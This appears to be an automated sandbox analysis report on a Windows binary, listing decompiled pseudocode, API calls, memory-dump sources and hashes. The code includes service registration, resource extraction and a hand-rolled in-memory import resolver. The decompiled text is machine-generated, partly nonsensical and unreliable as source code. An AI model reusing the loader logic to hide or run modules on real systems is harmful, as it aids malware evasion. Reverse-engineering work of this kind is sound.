                                                                                                                        
                                                                                                                        				_t9 = "     <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n</assembly>PA<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\r\n<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0xa56008
                                                                                                                        				_t10 = SetCurrentDirectoryA(_t9);
                                                                                                                        				_t27 = _a8;
                                                                                                                        				 *0x6f34043c = 0x20;
                                                                                                                        				 *0x6f340440 = 2;
                                                                                                                        				 *0x6f340444 = 0x85;
                                                                                                                        				 *0x6f340448 = 0;
                                                                                                                        				 *0x6f34044c = 0;
                                                                                                                        				 *0x6f340450 = 0;
                                                                                                                        				 *0x6f340454 = 0;
                                                                                                                        				__imp__RegisterServiceCtrlHandlerExW( *_t27, E6F333A70, 0, _t23, _t26);
                                                                                                                        				 *0x6f340394 = _t10;
                                                                                                                        				if(_t10 == 0) {
                                                                                                                        					 *0x6f340440 = 1;
                                                                                                                        					SetServiceStatus(0, 0x6f34043c);
                                                                                                                        					ExitProcess(0);
                                                                                                                        				}
                                                                                                                        				_t21 = _v8;
                                                                                                                        				 *0x6f340440 = 4;
                                                                                                                        				_t30 = _t21 - 1;
                                                                                                                        				if(_t30 <= 0) {
                                                                                                                        					L7:
                                                                                                                        					_t13 = HeapAlloc(GetProcessHeap(), 8, 4);
                                                                                                                        					if(_t13 != 0) {
                                                                                                                        						_t22 = M6F3404E8; // 0x1
                                                                                                                        						 *_t13 = _t22;
                                                                                                                        						CloseHandle(CreateThread(0, 0, E6F333930, _t13, 0, 0));
                                                                                                                        					}
                                                                                                                        					L9:
                                                                                                                        					_v4 = 0x6f34043c;
                                                                                                                        					_t14 =  *0x6f340394; // 0x0
                                                                                                                        					_v8 = _t14;
                                                                                                                        					return SetServiceStatus(??, ??);
                                                                                                                        				}
                                                                                                                        				_t18 = 1;
                                                                                                                        				if(_t30 <= 0) {
                                                                                                                        					goto L7;
                                                                                                                        				} else {
                                                                                                                        					while(1) {
                                                                                                                        						_t20 =  *((intOrPtr*)(_t27 + _t18 * 4));
                                                                                                                        						if( *_t20 == 0x73 &&  *((intOrPtr*)(_t20 + 2)) == 0) {
                                                                                                                        							goto L9;
                                                                                                                        						}
                                                                                                                        						_t18 = _t18 + 1;
                                                                                                                        						if(_t18 < _t21) {
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						goto L7;
                                                                                                                        					}
                                                                                                                        					goto L9;
                                                                                                                        				}
                                                                                                                        			}


















                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00A56008), ref: 6F333B68
                                                                                                                        • RegisterServiceCtrlHandlerExW.ADVAPI32(?,6F333A70,00000000), ref: 6F333BB3
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004,?,6F333A70,00000000), ref: 6F333BF8
                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333BFF
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333C1B
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,6F333A70,00000000), ref: 6F333C22
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C,?,6F333A70,00000000), ref: 6F333C51
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F333C58
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcessService$AllocCloseCreateCtrlCurrentDirectoryExitHandleHandlerRegisterStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2085172483-0
                                                                                                                        • Opcode ID: 56cbdfa558f69dca54de98f1c3b66dfcbbc10ae8b0920435d1bc4e9e75a7721a
                                                                                                                        • Instruction ID: 4e0bf0015c270c5cdf686b2fdccda863b4e9eed7adce4186e8579dfcc027ec46
                                                                                                                        • Opcode Fuzzy Hash: 56cbdfa558f69dca54de98f1c3b66dfcbbc10ae8b0920435d1bc4e9e75a7721a
                                                                                                                        • Instruction Fuzzy Hash: D22171B2A00A90EFCB20EF65C449A06BBBEFBE6724F50950EE54587310CB75A069CF11
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F334E50(struct HINSTANCE__* _a4, WCHAR* _a8) {
                                                                                                                        				signed int _t20;
                                                                                                                        				struct HINSTANCE__* _t22;
                                                                                                                        				int _t23;
                                                                                                                        				struct HRSRC__* _t28;
                                                                                                                        				void* _t29;
                                                                                                                        				void* _t30;
                                                                                                                        				void* _t32;
                                                                                                                        
                                                                                                                        				_t22 = _a4;
                                                                                                                        				_t30 = 0;
                                                                                                                        				_t28 = FindResourceW(_t22, _a8, 5);
                                                                                                                        				if(_t28 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t32 = LoadResource(_t22, _t28);
                                                                                                                        					if(_t32 != 0) {
                                                                                                                        						_t23 = SizeofResource(_t22, _t28);
                                                                                                                        						_t29 = LockResource(_t32);
                                                                                                                        						if(_t29 != 0) {
                                                                                                                        							_t30 = HeapAlloc(GetProcessHeap(), 8, _t23);
                                                                                                                        							RtlMoveMemory(_t30, _t29, _t23);
                                                                                                                        							_t20 =  *(_t30 + 0xc);
                                                                                                                        							if((_t20 & 0x40000000) == 0) {
                                                                                                                        								 *(_t30 + 8) =  *(_t30 + 8) & 0xfffbffff | 0x08000080;
                                                                                                                        							}
                                                                                                                        							 *(_t30 + 0xc) = _t20 & 0xefffffff;
                                                                                                                        							 *((intOrPtr*)(_t30 + 0x16)) = 0;
                                                                                                                        						}
                                                                                                                        						FreeResource(_t32);
                                                                                                                        					}
                                                                                                                        					return _t30;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • FindResourceW.KERNEL32(?,?,00000005), ref: 6F334E61
                                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 6F334E70
                                                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 6F334E7E
                                                                                                                        • LockResource.KERNEL32(00000000), ref: 6F334E87
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000), ref: 6F334E96
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F334E9D
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,00000000,00000000), ref: 6F334EA8
                                                                                                                        • FreeResource.KERNEL32(00000000), ref: 6F334ED7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Resource$Heap$AllocFindFreeLoadLockMemoryMoveProcessSizeof
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1815471765-0
                                                                                                                        • Opcode ID: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction ID: 5552bbe0884fbf667e1d4cc689b403cf4a17fa970377ca752b7090be4ae3ed36
                                                                                                                        • Opcode Fuzzy Hash: f656d0bbd55f484103c88bf511f25de415d8a019537d68e7b4a1f8ba1e757561
                                                                                                                        • Instruction Fuzzy Hash: C211C673A00F59ABD320DBBACC48E67BBADFB86771F00851DF516C2250DA35D8108760
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004D8A5C
                                                                                                                        • _wcscpy.LIBCMT ref: 004D8AF5
                                                                                                                        • _wcscat.LIBCMT ref: 004D8B03
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000003,?), ref: 004D8B22
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000003,?), ref: 004D8B38
                                                                                                                        • RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 004D8B54
                                                                                                                        • RegCreateKeyExW.ADVAPI32(80000001,?,00000000,00000000,00000000,00000003,00000000,?,00000000), ref: 004D8B6E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateOpen$H_prolog3_wcscat_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4233506698-0
                                                                                                                        • Opcode ID: 51e46ebc9f1460d57af698c2f93d9317549ca2521cb69f48d3185473187a247b
                                                                                                                        • Instruction ID: af9df4a72677d03553045917ee85afd16f459e38d70657900af2cd083c6ddade
                                                                                                                        • Opcode Fuzzy Hash: 51e46ebc9f1460d57af698c2f93d9317549ca2521cb69f48d3185473187a247b
                                                                                                                        • Instruction Fuzzy Hash: 78515EB290428DAEDB11DB94DD95BFE77BCAB08304F14806FF505A7382EA745F088B65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 0050417A
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 00503AC5: __EH_prolog3_catch.LIBCMT ref: 00503AD3
                                                                                                                          • Part of subcall function 00503AC5: _malloc.LIBCMT ref: 00503AFA
                                                                                                                          • Part of subcall function 00503AC5: __CxxThrowException@8.LIBCMT ref: 00503C2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalH_prolog3Section$Initialize$DeleteEnterException@8H_prolog3_catchLeaveThrow_malloc
                                                                                                                        • String ID: MOZILLA$NONE$OPERA$ProxySearch: Found setting $TV3REG
                                                                                                                        • API String ID: 3938852506-2993174309
                                                                                                                        • Opcode ID: 092a9cf1d48688292355860b95b26bdc76dba3e182ba9c484104556b4be0d7e7
                                                                                                                        • Instruction ID: bb87ceb9de428671a06510b63d19646442044be919961f2de3eb51c57445bc14
                                                                                                                        • Opcode Fuzzy Hash: 092a9cf1d48688292355860b95b26bdc76dba3e182ba9c484104556b4be0d7e7
                                                                                                                        • Instruction Fuzzy Hash: AB51F4B4904148EADB04FB64C962AED7F74AF31348F14449EF5021B1E2EB386F09CB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(00000002), ref: 004B4A4A
                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004B4A6C
                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004B4A84
                                                                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000104,00000001), ref: 004B4AA9
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 004B4ABE
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 004B4AC5
                                                                                                                          • Part of subcall function 004B48A9: CompareStringA.KERNEL32(00000409,00000001,?,000000FF,?,000000FF,?,004B4B75,?,?,?,?,?,?,?,?), ref: 004B48BF
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 004B4BC5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Module$DirectoryFileLibraryName$CompareFreeHandleLoadStringSystemWindows
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3624046510-0
                                                                                                                        • Opcode ID: ecc8c65531ea957c34a6aa78dc41afa616b0932244301d07a5f4c038a86935a2
                                                                                                                        • Instruction ID: 7bada881394fb758a7ba3291e7c2cee9e8d025cd33408074cb11b271dc47fdee
                                                                                                                        • Opcode Fuzzy Hash: ecc8c65531ea957c34a6aa78dc41afa616b0932244301d07a5f4c038a86935a2
                                                                                                                        • Instruction Fuzzy Hash: F751817294412D9ACF21DBA4DC94AEB77BCAF59304F0044E6D549D3102EA34DB888F64
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F331720(void* __edi) {
                                                                                                                        				struct HINSTANCE__* _v4;
                                                                                                                        				intOrPtr* _v8;
                                                                                                                        				intOrPtr _t40;
                                                                                                                        				intOrPtr _t42;
                                                                                                                        				struct HINSTANCE__* _t44;
                                                                                                                        				signed int _t46;
                                                                                                                        				intOrPtr _t47;
                                                                                                                        				signed short _t48;
                                                                                                                        				CHAR* _t49;
                                                                                                                        				_Unknown_base(*)()* _t51;
                                                                                                                        				signed int _t53;
                                                                                                                        				signed int _t54;
                                                                                                                        				signed int _t55;
                                                                                                                        				signed int _t59;
                                                                                                                        				void* _t60;
                                                                                                                        				intOrPtr* _t67;
                                                                                                                        				signed short* _t70;
                                                                                                                        				intOrPtr _t75;
                                                                                                                        				intOrPtr* _t78;
                                                                                                                        				void* _t83;
                                                                                                                        				signed short* _t88;
                                                                                                                        				void* _t94;
                                                                                                                        				signed short _t114;
                                                                                                                        
                                                                                                                        				_t83 = __edi;
                                                                                                                        				_t40 =  *((intOrPtr*)(__edi + 0xc0));
                                                                                                                        				if(_t40 == 0 ||  *((intOrPtr*)(__edi + 0xc4)) == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_t67 =  *((intOrPtr*)(__edi + 0x144)) + _t40;
                                                                                                                        					_t42 =  *((intOrPtr*)(_t67 + 0xc));
                                                                                                                        					_v8 = _t67;
                                                                                                                        					if(_t42 == 0) {
                                                                                                                        						L30:
                                                                                                                        						return 0;
                                                                                                                        					} else {
                                                                                                                        						_t94 = _v4;
                                                                                                                        						while(1) {
                                                                                                                        							_t44 = LoadLibraryA( *((intOrPtr*)(_t83 + 0x144)) + _t42);
                                                                                                                        							_v4 = _t44;
                                                                                                                        							if(_t44 == 0) {
                                                                                                                        								break;
                                                                                                                        							}
                                                                                                                        							_t46 =  *(_t83 + 0x154);
                                                                                                                        							if( *(_t83 + 0x150) < _t46) {
                                                                                                                        								L16:
                                                                                                                        								if(_t94 != 0) {
                                                                                                                        									_t53 =  *(_t83 + 0x150);
                                                                                                                        									_t54 = _t53 + 1;
                                                                                                                        									 *(_t83 + 0x150) = _t54;
                                                                                                                        									if( *((intOrPtr*)(_t94 + _t53 * 4)) != 0) {
                                                                                                                        										 *((intOrPtr*)(_t94 + _t54 * 4)) = _v4;
                                                                                                                        										 *(_t83 + 0x150) =  *(_t83 + 0x150) + 1;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								_t47 =  *((intOrPtr*)(_t83 + 0x144));
                                                                                                                        								_t78 = _v8;
                                                                                                                        								_t88 =  *((intOrPtr*)(_t67 + 0x10)) + _t47;
                                                                                                                        								_t70 = _t88;
                                                                                                                        								if( *((intOrPtr*)(_t78 + 4)) == 0) {
                                                                                                                        									L22:
                                                                                                                        									_t48 =  *_t70;
                                                                                                                        									_t114 = _t48;
                                                                                                                        									if(_t114 == 0) {
                                                                                                                        										L29:
                                                                                                                        										_t42 =  *((intOrPtr*)(_t78 + 0x20));
                                                                                                                        										_v8 = _t78 + 0x14;
                                                                                                                        										if(_t42 != 0) {
                                                                                                                        											_t67 = _v8;
                                                                                                                        											continue;
                                                                                                                        										} else {
                                                                                                                        											goto L30;
                                                                                                                        										}
                                                                                                                        									} else {
                                                                                                                        										L23:
                                                                                                                        										if(_t114 >= 0) {
                                                                                                                        											_t49 = _t48 +  *((intOrPtr*)(_t83 + 0x144)) + 2;
                                                                                                                        										} else {
                                                                                                                        											_t49 = _t48 & 0x0000ffff;
                                                                                                                        										}
                                                                                                                        										_t51 = GetProcAddress(_v4, _t49);
                                                                                                                        										 *_t88 = _t51;
                                                                                                                        										if(_t51 == 0) {
                                                                                                                        											break;
                                                                                                                        										}
                                                                                                                        										_t48 = _t70[2];
                                                                                                                        										_t70 =  &(_t70[2]);
                                                                                                                        										_t88 =  &(_t88[2]);
                                                                                                                        										if(_t48 != 0) {
                                                                                                                        											goto L23;
                                                                                                                        										} else {
                                                                                                                        											_t78 = _v8;
                                                                                                                        											goto L29;
                                                                                                                        										}
                                                                                                                        									}
                                                                                                                        								} else {
                                                                                                                        									_t75 =  *_t78;
                                                                                                                        									if(_t75 == 0) {
                                                                                                                        										return 8;
                                                                                                                        									} else {
                                                                                                                        										_t70 = _t75 + _t47;
                                                                                                                        										goto L22;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        							} else {
                                                                                                                        								if(_t46 == 0) {
                                                                                                                        									_t55 = 0x10;
                                                                                                                        								} else {
                                                                                                                        									_t55 = _t46 + _t46;
                                                                                                                        								}
                                                                                                                        								 *(_t83 + 0x154) = _t55;
                                                                                                                        								_t94 = HeapAlloc(GetProcessHeap(), 8, _t55 * 4);
                                                                                                                        								if(_t94 == 0) {
                                                                                                                        									return 3;
                                                                                                                        								} else {
                                                                                                                        									_t59 =  *(_t83 + 0x150);
                                                                                                                        									if(_t59 != 0) {
                                                                                                                        										RtlMoveMemory(_t94,  *(_t83 + 0x14c), _t59 + _t59 + _t59 + _t59);
                                                                                                                        									}
                                                                                                                        									_t60 =  *(_t83 + 0x14c);
                                                                                                                        									if(_t60 != 0) {
                                                                                                                        										HeapFree(GetProcessHeap(), 0, _t60);
                                                                                                                        									}
                                                                                                                        									 *(_t83 + 0x14c) = _t94;
                                                                                                                        									goto L16;
                                                                                                                        								}
                                                                                                                        							}
                                                                                                                        							goto L35;
                                                                                                                        						}
                                                                                                                        						return 6;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        				L35:
                                                                                                                        			}


























                                                                                                                        0x6f33183f
                                                                                                                        0x00000000
                                                                                                                        0x6f33183f
                                                                                                                        0x6f33183d
                                                                                                                        0x6f33178d
                                                                                                                        0x6f33178f
                                                                                                                        0x6f331795
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f331791
                                                                                                                        0x6f3317aa
                                                                                                                        0x6f3317b9
                                                                                                                        0x6f3317bd
                                                                                                                        0x6f3318a2
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317c3
                                                                                                                        0x6f3317cb
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317da
                                                                                                                        0x6f3317df
                                                                                                                        0x6f3317e7
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317ef
                                                                                                                        0x6f3317f5
                                                                                                                        0x00000000
                                                                                                                        0x6f3317f5
                                                                                                                        0x6f3317bd
                                                                                                                        0x00000000
                                                                                                                        0x6f33178b
                                                                                                                        0x6f3318ba
                                                                                                                        0x6f3318ba
                                                                                                                        0x6f331752
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 6F33176D
                                                                                                                        • GetProcessHeap.KERNEL32(00000008), ref: 6F3317B0
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F3317B3
                                                                                                                        • RtlMoveMemory.NTDLL(00000000,?,?), ref: 6F3317DA
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 6F3317EC
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3317EF
                                                                                                                        • GetProcAddress.KERNEL32(?,?), ref: 6F33185F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AddressAllocFreeLibraryLoadMemoryMoveProc
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2239585089-0
                                                                                                                        • Opcode ID: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction ID: ea0467e0b8c6b71df47d3204a102e90d60006ee14d2fb1e978779f0e02a6d6fc
                                                                                                                        • Opcode Fuzzy Hash: 7b2e3cdfbba2c410e3b28f0084f4e3715afce06fa7edaab036c5e0ed8c34dfc8
                                                                                                                        • Instruction Fuzzy Hash: 02416076F007569BEB14EF68D8447A6B7A9FF44315F04862AE828CB341E735F814CBA0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __mtinitlocknum.LIBCMT ref: 0055533D
                                                                                                                          • Part of subcall function 00544539: __FF_MSGBANNER.LIBCMT ref: 00544555
                                                                                                                        • __lock.LIBCMT ref: 00555351
                                                                                                                        • __lock.LIBCMT ref: 0055539A
                                                                                                                        • ___crtInitCritSecAndSpinCount.LIBCMT ref: 005553B5
                                                                                                                        • EnterCriticalSection.KERNEL32(?,007D5F28,00000018,005576D5,?,00000000,00000109), ref: 005553DB
                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 005553E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection__lock$CountCritEnterInitLeaveSpin___crt__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2236623020-0
                                                                                                                        • Opcode ID: 75efc9a076f0ff99eb1508f29c16bfe3a0046184fb8130b5b5b9b267a986f4eb
                                                                                                                        • Instruction ID: 0acc2d46530a689c0f3af0a0911e42c1ecb00f31fcb1a829b0c863d890cfecbe
                                                                                                                        • Opcode Fuzzy Hash: 75efc9a076f0ff99eb1508f29c16bfe3a0046184fb8130b5b5b9b267a986f4eb
                                                                                                                        • Instruction Fuzzy Hash: CE415930904B02CBDF208FA8D86939DBFE07F41337F25862EE525961D1E7B49988CB10
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33175E(intOrPtr __eax, void* __edi, intOrPtr* _a12, struct HINSTANCE__* _a16) {
                                                                                                                        				intOrPtr _t34;
